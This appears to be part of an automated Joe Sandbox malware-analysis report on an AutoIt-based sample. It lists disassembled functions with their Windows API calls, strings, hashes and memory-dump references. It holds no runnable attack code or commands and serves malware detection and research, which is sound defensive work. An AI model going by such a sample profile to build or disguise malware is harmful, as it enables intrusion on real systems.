                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuerySleep
                          • String ID:
                          • API String ID: 2875609808-0
                          • Opcode ID: fedd0a284621016474c4a0493660a923ebe76ad15550ba0d81dcb53cdd62d13a
                          • Instruction ID: 2f48ccc28d2e2045f6dc476b585073ca1924268233aff1d91e1577d92acc3151
                          • Opcode Fuzzy Hash: fedd0a284621016474c4a0493660a923ebe76ad15550ba0d81dcb53cdd62d13a
                          • Instruction Fuzzy Hash: 55115E31D00A1CDBCF04AFA8E988AEEBF78FF19701F008055D945B6280CB305554EB9A
                          Function 00547117 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                          • String ID:
                          • API String ID: 3016257755-0
                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction ID: 9e193a1c1cda7520b2f5f50840b15caa3e42a8e8d0a04735bc4a8ad8fe649aea
                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                          • Instruction Fuzzy Hash: 2F01497244824EBBCF125E84CC05CEE3F26BB1C359B599815FA1899131D336C9B2EB81
                          Function 0059B6B2 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          • GetWindowRect.USER32(?,?), ref: 0059B6D1
                          • ScreenToClient.USER32(?,?), ref: 0059B6E9
                          • ScreenToClient.USER32(?,?), ref: 0059B70D
                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0059B728
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClientRectScreen$InvalidateWindow
                          • String ID:
                          • API String ID: 357397906-0
                          • Opcode ID: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                          • Instruction ID: faa64af90d0608e1a5ab4fc3d09bb692d0ab7bd0dcdb4321a3b7fc1cff41c4ad
                          • Opcode Fuzzy Hash: bd6bbab6a15ce1ee67574362dd2e743979f05d06c9369fca7ffe6ba38fee2e74
                          • Instruction Fuzzy Hash: BC1163B9D00209EFDF41CF98D8849EEBBF9FB59310F104156E914E3610D731AA659F90
                          Function 0059BA22 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0059BA31
                          • _memset.LIBCMT ref: 0059BA40
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D7F20,005D7F64), ref: 0059BA6F
                          • CloseHandle.KERNEL32 ref: 0059BA81
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memset$CloseCreateHandleProcess
                          • String ID:
                          • API String ID: 3277943733-0
                          • Opcode ID: 44d8d9915c49be4f2904f6c37080a0642ca29dd63b63edbb8172048c5e8c43f0
                          • Instruction ID: 336c69d7913a87a9095213c1fc3bbfd46da640fd9ecef896761ddffe63243b79
                          • Opcode Fuzzy Hash: 44d8d9915c49be4f2904f6c37080a0642ca29dd63b63edbb8172048c5e8c43f0
                          • Instruction Fuzzy Hash: 95F0BEB250430A7BF6302765AC0AFBB3F9CEB1D710F000023BA08D52A1E7B15C14D7A8
                          Function 00577002 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • EnterCriticalSection.KERNEL32(?), ref: 0057700E
                            • Part of subcall function 00577AEC: _memset.LIBCMT ref: 00577B21
                          • _memmove.LIBCMT ref: 00577031
                          • _memset.LIBCMT ref: 0057703E
                          • LeaveCriticalSection.KERNEL32(?), ref: 0057704E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalSection_memset$EnterLeave_memmove
                          • String ID:
                          • API String ID: 48991266-0
                          • Opcode ID: 24c531f67390a34eef7edcbf999c2decd6c13f53875ad5417350761877c3ecfa
                          • Instruction ID: 54f0f7db03d31e0df53c051d0846fa4cc9a61495fa58db5f67ec8f5836426614
                          • Opcode Fuzzy Hash: 24c531f67390a34eef7edcbf999c2decd6c13f53875ad5417350761877c3ecfa
                          • Instruction Fuzzy Hash: 2BF0307A100104ABCF016F55EC89E4ABF29FF85320F08C055FE085E266C771A915DBB4
                          Function 0059C13F Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                            • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C163
                          • LineTo.GDI32(00000000,?,?), ref: 0059C170
                          • EndPath.GDI32(00000000), ref: 0059C180
                          • StrokePath.GDI32(00000000), ref: 0059C18E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                          • String ID:
                          • API String ID: 1539411459-0
                          • Opcode ID: 2e78fa2d03d8381957c6c3a4c78a1561f74bc96accee139caff8e8cc4e7687c4
                          • Instruction ID: 96463d2bf9e28817e93ad18bcd7f6b7b8695ba2622765928e88eded1a59801c2
                          • Opcode Fuzzy Hash: 2e78fa2d03d8381957c6c3a4c78a1561f74bc96accee139caff8e8cc4e7687c4
                          • Instruction Fuzzy Hash: 26F05E31005259BBDB126F94AC0DFCE3F99BF16310F044141FA11250E1C775555AFBA9
                          Function 0056A835 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0056A852
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0056A865
                          • GetCurrentThreadId.KERNEL32 ref: 0056A86C
                          • AttachThreadInput.USER32(00000000), ref: 0056A873
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                          • String ID:
                          • API String ID: 2710830443-0
                          • Opcode ID: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                          • Instruction ID: 55f467a09684283b6e0a7235bf6f4098309f2c9a18c674dd674c9b09200146d0
                          • Opcode Fuzzy Hash: fc7e98d7ba5532037bd25951984227722b0a102f692b62f6f31364435e2ef0d8
                          • Instruction Fuzzy Hash: 0DE03931101228BAEB211BA29C0CEEB3F1CFF627A1F009020F509A7090C771C995DBA0
                          Function 005125F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                          Download Yara Rule
                          APIs
                          • GetSysColor.USER32(00000008), ref: 0051260D
                          • SetTextColor.GDI32(?,000000FF), ref: 00512617
                          • SetBkMode.GDI32(?,00000001), ref: 0051262C
                          • GetStockObject.GDI32(00000005), ref: 00512634
                          • GetWindowDC.USER32(?,00000000), ref: 0054C0F4
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054C101
                          • GetPixel.GDI32(00000000,?,00000000), ref: 0054C11A
                          • GetPixel.GDI32(00000000,00000000,?), ref: 0054C133
                          • GetPixel.GDI32(00000000,?,?), ref: 0054C153
                          • ReleaseDC.USER32(?,00000000), ref: 0054C15E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                          • String ID:
                          • API String ID: 1946975507-0
                          • Opcode ID: 1aa13a3cb49291907e25e537abd4a25175d4d5346eeb7f861eea5d2774c896bc
                          • Instruction ID: e051755c00b39fa92ea2b86ad5c7807ccb4ac4361c140af4992df7a718ee91ae
                          • Opcode Fuzzy Hash: 1aa13a3cb49291907e25e537abd4a25175d4d5346eeb7f861eea5d2774c896bc
                          • Instruction Fuzzy Hash: 26E06D31610244AAEB615F64AC0DBE83F20FB6A336F048366FA69480E187714994EB12
                          Function 00569113 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 0056911C
                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569123
                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00568CE7), ref: 00569130
                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,00568CE7), ref: 00569137
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CurrentOpenProcessThreadToken
                          • String ID:
                          • API String ID: 3974789173-0
                          • Opcode ID: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                          • Instruction ID: a9773e4d55cd89e018471038561ae0de8687436e134c26eea2f2addb33d3c374
                          • Opcode Fuzzy Hash: 93581c3b5518137ef403ad1cd0e77fce2e0522f23881f98c730c1829769e31b6
                          • Instruction Fuzzy Hash: A5E08676611311AFD7605FB0AE0CB573B6CFF66792F104818B245CA0D0E634954ADB51
                          Function 005505A9 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 005505A9
                          • GetDC.USER32(00000000), ref: 005505B3
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005505D3
                          • ReleaseDC.USER32(?), ref: 005505F4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 359308b4e3100c04f112a0f7193962fd5cfc6d9dba98c2178b766b3a5568d3de
                          • Instruction ID: 1a3f89a7263ce0155c8c18badd7dd469a963682f4dab7983677bd8cc4cd27863
                          • Opcode Fuzzy Hash: 359308b4e3100c04f112a0f7193962fd5cfc6d9dba98c2178b766b3a5568d3de
                          • Instruction Fuzzy Hash: 3DE0E5B5810204EFDB419F60D808A9D7FB1BBAD315F109409F95AA7290DB388595AF50
                          Function 005505BD Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                          Download Yara Rule
                          APIs
                          • GetDesktopWindow.USER32 ref: 005505BD
                          • GetDC.USER32(00000000), ref: 005505C7
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 005505D3
                          • ReleaseDC.USER32(?), ref: 005505F4
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDesktopDeviceReleaseWindow
                          • String ID:
                          • API String ID: 2889604237-0
                          • Opcode ID: 91b4b45b8245b77a7f43aaa8e12c13188c1da73621c054ab4b3adb441bbfd36d
                          • Instruction ID: c079d700ef91c4b268fc9639f98316c904fe8a94187af665f897a685953bfdd2
                          • Opcode Fuzzy Hash: 91b4b45b8245b77a7f43aaa8e12c13188c1da73621c054ab4b3adb441bbfd36d
                          • Instruction Fuzzy Hash: 80E012B5810204AFDF419FA0D80CA9D7FF1BBAD314F109408F95AA7290DB389596AF50
                          Function 0058B354 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __itow_s
                          • String ID: xr]$xr]
                          • API String ID: 3653519197-3118715198
                          • Opcode ID: 04cdc1ca3d77ce53ee439b6295b0e1cf7771a7e481326e166917aa1291f381c9
                          • Instruction ID: bddfed675d03a2b50df8cafeda40140a15ae44a9d6715e9e3466100cdb900829
                          • Opcode Fuzzy Hash: 04cdc1ca3d77ce53ee439b6295b0e1cf7771a7e481326e166917aa1291f381c9
                          • Instruction Fuzzy Hash: 04B18F74A0010AAFEB24EF55C895DBABFB9FF98300F148459FD45AB291EB31D981CB50
                          Function 0056BC6F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                          Download Yara Rule
                          APIs
                          • OleSetContainedObject.OLE32(?,00000001), ref: 0056BE3A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ContainedObject
                          • String ID: AutoIt3GUI$Container
                          • API String ID: 3565006973-3941886329
                          • Opcode ID: c66e4ca14f01b6699c4c01c30ac42e5ef5b978cd019d58ceae09b2da03bf2f09
                          • Instruction ID: 659b57c5e71ee6a626e2cb09df14c58daf7c3a31fdcb9cb1c942290961f34af9
                          • Opcode Fuzzy Hash: c66e4ca14f01b6699c4c01c30ac42e5ef5b978cd019d58ceae09b2da03bf2f09
                          • Instruction Fuzzy Hash: 3B914870200601AFEB54DF64C894BAABBF8FF49710F14856DE94ACB691DB71EC81CB60
                          Function 0057B45C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                            • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                            • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                          • __wcsnicmp.LIBCMT ref: 0057B4DD
                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0057B5A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                          • String ID: LPT
                          • API String ID: 3222508074-1350329615
                          • Opcode ID: 0d5c4077411685ba4edf21f45df358a9987653adf64a57640327b1c746a855c6
                          • Instruction ID: c3243e1adec057dba966502aae0f1345e573c5649690410b81f18fd73b803ed7
                          • Opcode Fuzzy Hash: 0d5c4077411685ba4edf21f45df358a9987653adf64a57640327b1c746a855c6
                          • Instruction Fuzzy Hash: D3617075A00219AFEF14DF94D895FAEBBB4FF48310F118459F50AAB291E770AE80DB50
                          Function 00556FF4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: #VR
                          • API String ID: 4104443479-2899241889
                          • Opcode ID: 1554d5d8665c3e99e7fa17539c0e0bf8ac4a7bce63f3806d3f27a54465cb024a
                          • Instruction ID: b41ee302838103cc7a16e39e10229765c35952277dacd7a30c9e7edcb4732112
                          • Opcode Fuzzy Hash: 1554d5d8665c3e99e7fa17539c0e0bf8ac4a7bce63f3806d3f27a54465cb024a
                          • Instruction Fuzzy Hash: EB51BE70A006199FCF20CF68D894AAEBFF1FF45305F20852AE85AD7290E731A959CF51
                          Function 0051E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000), ref: 0051E01E
                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 0051E037
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: GlobalMemorySleepStatus
                          • String ID: @
                          • API String ID: 2783356886-2766056989
                          • Opcode ID: 79004841c7668152d8276d581d6328954fc13273a714191cf332e4bdda15d833
                          • Instruction ID: cd796757890708af2636c1a0fedccb98fc2fb6f94dc9bedf85a1dcde0136941d
                          • Opcode Fuzzy Hash: 79004841c7668152d8276d581d6328954fc13273a714191cf332e4bdda15d833
                          • Instruction Fuzzy Hash: 6C515BB1408B459BE320AF50E889BAFBBE8FFC5314F814D5DF1D841191EB7095A9CB16
                          Function 0054EBD6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: Dt]$Dt]
                          • API String ID: 1473721057-2068989559
                          • Opcode ID: 552e29472a7497323fc4c30f049d8f04fa13e5935ca3e34ec0f04bb29c761c85
                          • Instruction ID: 998a4dc0837f83081615a1dc5a215076b06343ae77e5851cf795967685ede537
                          • Opcode Fuzzy Hash: 552e29472a7497323fc4c30f049d8f04fa13e5935ca3e34ec0f04bb29c761c85
                          • Instruction Fuzzy Hash: 8A410978605642CFDB20CF18C480A96BFE1BBD8354F64485EE8858B361E770EC85DB82
                          Function 00582A3E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00582A4E
                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00582A84
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CrackInternet_memset
                          • String ID: |
                          • API String ID: 1413715105-2343686810
                          • Opcode ID: 0f2bdb2035bdbb7b6fe639aae7b3cd93a6f67c94cbd217e5c8dcaa9b2bdb2157
